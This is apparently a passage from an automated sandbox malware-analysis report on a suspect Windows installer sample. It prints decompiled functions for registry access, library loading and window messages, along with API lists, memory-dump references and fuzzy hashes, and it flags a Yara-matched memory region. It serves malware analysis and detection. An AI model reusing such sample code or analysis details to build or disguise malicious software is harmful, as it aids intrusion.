							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                            0x004020d8
                                                                            0x004020d8
                                                                            0x004020dd
                                                                            0x004020e4
                                                                            0x004021a3
                                                                            0x004022f1
                                                                            0x004022f1
                                                                            0x00402c2a
                                                                            0x00402c2d
                                                                            0x00402c39
                                                                            0x00402c39
                                                                            0x004020f3
                                                                            0x004020fd
                                                                            0x00402100
                                                                            0x00402110
                                                                            0x00402114
                                                                            0x0040211a
                                                                            0x0040211c
                                                                            0x0040211f
                                                                            0x0040219c
                                                                            0x00000000
                                                                            0x0040219c
                                                                            0x00402121
                                                                            0x0040212c
                                                                            0x00402130
                                                                            0x00402170
                                                                            0x00402132
                                                                            0x00402135
                                                                            0x00402138
                                                                            0x00402164
                                                                            0x0040213a
                                                                            0x0040213d
                                                                            0x00402146
                                                                            0x00402148
                                                                            0x00402148
                                                                            0x00402146
                                                                            0x00402138
                                                                            0x00402178
                                                                            0x00402191
                                                                            0x00402191
                                                                            0x00000000
                                                                            0x00402178
                                                                            0x00402103
                                                                            0x0040210b
                                                                            0x0040210e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00403418), ref: 004055FA
                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 0040560C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 334405425-0
                                                                            • Opcode ID: 57a0a3861126cd1cf6113bcab6e3fe6859f719f612c4d6b86b9542baaaa6fbc1
                                                                            • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                            • Opcode Fuzzy Hash: 57a0a3861126cd1cf6113bcab6e3fe6859f719f612c4d6b86b9542baaaa6fbc1
                                                                            • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 86%
                                                                            			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t24 = E00402DE6(_t29, 0x20019);
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}











                                                                            0x0040259e
                                                                            0x0040259e
                                                                            0x0040259e
                                                                            0x004025aa
                                                                            0x004025ac
                                                                            0x004025b4
                                                                            0x004025b7
                                                                            0x004025ba
                                                                            0x0040292e
                                                                            0x004025c0
                                                                            0x004025c8
                                                                            0x004025cb
                                                                            0x004025e4
                                                                            0x004025ea
                                                                            0x004025ec
                                                                            0x004025ee
                                                                            0x004025ee
                                                                            0x004025cd
                                                                            0x004025d1
                                                                            0x004025d1
                                                                            0x004025f5
                                                                            0x004025fc
                                                                            0x004025fd
                                                                            0x004025fd
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseValue
                                                                            • String ID:
                                                                            • API String ID: 397863658-0
                                                                            • Opcode ID: cc6a752f63a426fde86cf9928d668e254d875c271901be1d977c77956d712f75
                                                                            • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                            • Opcode Fuzzy Hash: cc6a752f63a426fde86cf9928d668e254d875c271901be1d977c77956d712f75
                                                                            • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAB9A8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: }|&
                                                                            • API String ID: 0-653347186
                                                                            • Opcode ID: 85c5c80e6103adabe415035f93819484d2f585a537dee9f9bc7fa7d38fbcf92b
                                                                            • Instruction ID: ca2364b3e366102c999e33f23af6601be23b05577be50df3a31dd7f6d5093fc9
                                                                            • Opcode Fuzzy Hash: 85c5c80e6103adabe415035f93819484d2f585a537dee9f9bc7fa7d38fbcf92b
                                                                            • Instruction Fuzzy Hash: 846135319083969FCF369F788AA83DA7FA5AF1A310F04056ECD869F117DB318545CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAE2FC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,02AB9EE4,D6B37BD0,-DB19C8CC), ref: 02AB913B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID: }|&
                                                                            • API String ID: 1029625771-653347186
                                                                            • Opcode ID: 535e079884dc8f3a68de5fcb13f4cebc0888c32d0033f7aae312bf069ee5d83e
                                                                            • Instruction ID: b67bed87bda5d27cc6a34847b74270f916477fc22fabb8cb95df5fda9ed5a544
                                                                            • Opcode Fuzzy Hash: 535e079884dc8f3a68de5fcb13f4cebc0888c32d0033f7aae312bf069ee5d83e
                                                                            • Instruction Fuzzy Hash: 50313D725007459FDF359E398EA87EE37AB9FD9350F51403ACC099B215DF308A468B41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AADF25 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,02AB9EE4,D6B37BD0,-DB19C8CC), ref: 02AB913B
                                                                              • Part of subcall function 02AB9DB7: NtAllocateVirtualMemory.NTDLL ref: 02ABA065
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateLibraryLoadMemoryVirtual
                                                                            • String ID: }|&
                                                                            • API String ID: 2616484454-653347186
                                                                            • Opcode ID: 50e4644f226489818fe894671d5eb275e1adf822dd35ddd6f7c6ae0181c54b45
                                                                            • Instruction ID: 7774308afdab2e2fe6b6b9046a0ff87ba20d5ba5aeac0afed35ce5b57f910640
                                                                            • Opcode Fuzzy Hash: 50e4644f226489818fe894671d5eb275e1adf822dd35ddd6f7c6ae0181c54b45
                                                                            • Instruction Fuzzy Hash: 5611B2716447459FDB21AF798E886EE76AAAF85714F42402ADA588A209DB304A41CF02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AB906B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,02AB9EE4,D6B37BD0,-DB19C8CC), ref: 02AB913B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID: }|&
                                                                            • API String ID: 1029625771-653347186
                                                                            • Opcode ID: 7ca48be7da4923d80957e66acd6365b8e073fe531586c643dd95235e72cf8e6c
                                                                            • Instruction ID: 552c952d8de153dc40530e23a59c704300cff5c8e286242e5c7c4a41fd6ae8d4
                                                                            • Opcode Fuzzy Hash: 7ca48be7da4923d80957e66acd6365b8e073fe531586c643dd95235e72cf8e6c
                                                                            • Instruction Fuzzy Hash: 7701A2716407865BDF30AF2D9998BDE77B6BF85700F41803AEA1CDB205DA344A018F12
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 84%
                                                                            			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E00406484(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}








                                                                            0x0040252a
                                                                            0x0040252a
                                                                            0x0040252f
                                                                            0x00402536
                                                                            0x00402538
                                                                            0x0040253f
                                                                            0x00402542
                                                                            0x0040292e
                                                                            0x00402548
                                                                            0x0040254b
                                                                            0x00402566
                                                                            0x00402596
                                                                            0x00402596
                                                                            0x00402599
                                                                            0x00402568
                                                                            0x0040256c
                                                                            0x00402585
                                                                            0x0040258c
                                                                            0x0040258f
                                                                            0x0040256e
                                                                            0x00402571
                                                                            0x0040257c
                                                                            0x004025f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402571
                                                                            0x0040256c
                                                                            0x004025fc
                                                                            0x004025fd
                                                                            0x004025fd
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: 96f832c9e1a127fe746b96bce77bc689ea8785a9dbaacf4930f815db16be5405
                                                                            • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                            • Opcode Fuzzy Hash: 96f832c9e1a127fe746b96bce77bc689ea8785a9dbaacf4930f815db16be5405
                                                                            • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 69%
                                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}











                                                                            0x0040138a
                                                                            0x004013fa
                                                                            0x0040139b
                                                                            0x004013a0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004013a2
                                                                            0x004013a3
                                                                            0x004013ad
                                                                            0x00000000
                                                                            0x00401404
                                                                            0x004013b0
                                                                            0x004013b7
                                                                            0x004013bd
                                                                            0x004013be
                                                                            0x004013c0
                                                                            0x004013c2
                                                                            0x004013b9
                                                                            0x004013b9
                                                                            0x004013ba
                                                                            0x004013ba
                                                                            0x004013c9
                                                                            0x004013cb
                                                                            0x004013f4
                                                                            0x004013f4
                                                                            0x004013c9
                                                                            0x00000000

                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                            • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                            • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                            • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402434(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t18 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1);
					goto L4;
				} else {
					_t10 = E00402DE6(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                                            0x00402434
                                                                            0x00402434
                                                                            0x00402437
                                                                            0x0040243a
                                                                            0x0040247b
                                                                            0x00000000
                                                                            0x0040243c
                                                                            0x0040243e
                                                                            0x00402443
                                                                            0x00402447
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x0040244d
                                                                            0x0040245d
                                                                            0x0040245f
                                                                            0x0040247d
                                                                            0x0040247f
                                                                            0x00000000
                                                                            0x00402485
                                                                            0x0040247f
                                                                            0x00402447
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue
                                                                            • String ID:
                                                                            • API String ID: 2831762973-0
                                                                            • Opcode ID: 1ffd97200620b81b13f579f7a6b9042f689ecff3e700d3aee6761a43d8bd64c6
                                                                            • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                                                            • Opcode Fuzzy Hash: 1ffd97200620b81b13f579f7a6b9042f689ecff3e700d3aee6761a43d8bd64c6
                                                                            • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                                                            • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                            • Opcode Fuzzy Hash: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                                                            • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                            0x00406912
                                                                            0x00406915
                                                                            0x0040691c
                                                                            0x00406924
                                                                            0x00406930
                                                                            0x00000000
                                                                            0x00406937
                                                                            0x00406927
                                                                            0x0040692e
                                                                            0x00000000
                                                                            0x0040693f
                                                                            0x00000000

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                              • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                              • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                              • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
